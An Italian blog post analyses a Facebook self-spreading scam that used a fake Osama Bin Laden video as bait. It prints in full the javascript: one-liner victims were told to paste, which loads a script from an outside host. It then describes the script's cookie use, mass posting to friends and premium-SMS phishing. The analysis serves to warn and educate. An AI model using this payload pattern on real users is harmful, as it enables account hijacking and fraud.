By QUALSIASI
Il video di Osama su Facebook, anatomia di un “virus”.
Virus virgolettato, perché lo è formalmente – ma a ben vedere, non è un infezione “cronica” – dura il tempo di esecuzione di uno script. Da ieri, che io sappia, gira su facebook un link che dovrebbe contenere il video dell’esecuzione di Osama Bin Laden. Ovviamente è un falso e quando si clicca viene presentata una pagina di questo tipo:
Fan page incriminata su Facebook
Innanzitutto copiare e incollare qualcosa che non si capisce (e che palesemente non è un indirizzo web) nella barra degli indirizzi è cosa cattiva e sbagliata. Facebook ce la mette tutta, filtrando i contenuti visualizzabili sulle sue pagine interne – e di fatti per aggirare le restrizioni che non permetterebbero il diffondersi di certi programmi (script) malevoli, il cattivone di turno deve affidarsi al mitico errore PEBKAC ( “Problem Exists Between Keyboard And Chair” ) ovvero all’utente poco saggio che fa tutto quello che gli dici senza sapere cosa sta facendo. Fantastico.
Andiamo oltre e vediamo qual’è il codice che dobbiamo copiare e incollare.
javascript:(a=(b=document).createElement('script')).src='//strummer5202.info/you/joe.php?'+Math.random(), b.body.appendChild(a); void(0)
Ho riformattato leggermente il codice per una più facile lettura. In pratica esegue un comando “inline” javascript che crea un elemento script e e nel campo SRC inserisce l’url ”strummer5202.info/you/joe.php” concatenandoci un numero casuale. La seconda riga inserisce nel documento corrente lo script appena creato, mentre l’ultima linea non esegue nulla. Notare l’utilizzo della virgola invece del punto e virgola, è il “comma operator” – una finezza che non sono sicuro fosse necessaria.
Vediamo brevemente il codice che viene inserito nella pagina da questo comando:
// Il codice l'ho rimosso perchè mi rovinava il layout // e comunque non era così interessante, se avete // conoscenza di AJAX, potete scrivervelo in pochi minuti // da soli.
Senza entrare nel dettaglio, vediamo come come prima cosa legge un cookie, che evidentemente serve per comunicare con facebook – poi scarica la lista degli amici e inserisce il link sulla bacheca dei primi 400 amici. In seguito manipola lo stile della barra inferiore per nasconderla, e invia il link anche a tutti gli amici online in chat. Come ultima cosa, porta l’utente ad una pagina esterna a facebook, dove viene chiesto di verificare l’account inserendo il numero di telefono. La pagina si presenta come “verosimile” anche se lo stile non è proprio quello ufficiale di facebook, e l’italiano è un po’ troppo informale.
Inserisci il tuo numero e ritrovati il credito prosciugato.
Ovviamente non ho inserito il numero, ma è verosimile pensare che ci si abboni a qualche servizio a pagamento, possibilmente molto costoso – così oltre al danno anche la beffa. Il riquadro è un frame, che contiene un altro sito di servizi in abbonamento per telefoni cellulari. Non so se l’indirizzo viene generato dinamicamente, comunque il frame intero, e non ritagliato “ad hoc” contiene anche le informazioni sul servizio a cui ci si ritrova abbonati inserendo il proprio numero:
Servizio in abbonamento, riservato ai maggiorenni, disponibile per i clienti di TIM, Vodafone, WIND e 3. Prima di attivare il servizio e scaricare il contenuto, confermare di aver letto Termini di Servizio, [...] costo del servizio 5 Euro a settimana IVA inc. Dal costo del servizio è escluso il traffico WAP dove previsto. Costo SMS di richiesta TIM e WIND 12,4 centesimi IVA inc. (WIND: 50 centesimi IVA inc. dall’estero), Vodafone e 3 secondo proprio piano tariffario. [...] Per disattivare manda un SMS con scritto RI STOP al 4890897.
Il servizio sembra completamente legittimo (anche perchè in collaborazione con una grande azienda di telecomunicazioni), ho tagliato alcune parti in cui compare il nome del fornitore del servizio perché la mia impressione è che non centri assolutamente con l’autore del “virus” che voleva semplicemente fare più danni possibile.
UPDATE: mi hanno risposto via email i gestori del “frame” che veniva incluso nella pagina finale – ed ovviamente sono completamente estranei alla vicenda, io lascio il numero per la disattivazione del servizio nel caso qualche lettore sprovveduto si fosse a sua insaputa iscritto al servizio. Il sito “verifica-account.com” è già offline come anche il sito “strummer5202.info” – direi che le autorità o chi per loro (amministratori dei vari ISP coinvolti) sono stati veloci.
